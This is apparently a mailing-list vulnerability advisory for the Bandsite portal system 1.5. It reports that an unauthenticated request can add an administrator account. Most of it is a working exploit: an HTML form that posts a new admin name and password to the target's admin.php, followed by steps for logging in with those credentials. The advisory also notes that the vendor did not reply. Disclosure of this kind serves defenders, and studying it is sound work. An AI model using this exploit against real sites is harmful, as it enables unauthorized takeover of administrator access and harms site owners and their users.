vulnerability in Bandsite Allows Gaining Admin Access.

["NaSsEr .M.Sh" <nmsh_sa () yahoo com>]

Informations :
°°°°°°°°°°°°°°
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php 
- Author  : Jelle de Vos
- Tested version :1.5
- Problem : vulnerability in Bandsite Allows Gaining Admin Access.

Product Description :
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, 
guestbook, tour guide, an admin section to manage overall data and configurations, and more.

Exploits :
°°°°°°°°°°
=====================   nmsh.htm    ==============================
      <TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
        <TBODY>
        <tr><td bgcolor=#ffffff>
&nbsp;</p>
<p>
<form action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins method=post>
   Name:<br>
<input type=text name='name' value='nmsh' size="20"><br>
   Pass:<br>
<input type=text name='pass' value='nmsh' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>
=====================    nmsh.htm   ==============================
The admin has been added!
:(
now go to this link :
http://[target]/bandwebsite/login.php
and login as admin 
name : nmsh
pass : nmsh
Vendor:
°°°°°°°
Vendor has been contacted, no reply received. 

Provided by :
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com


---------------------------------
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software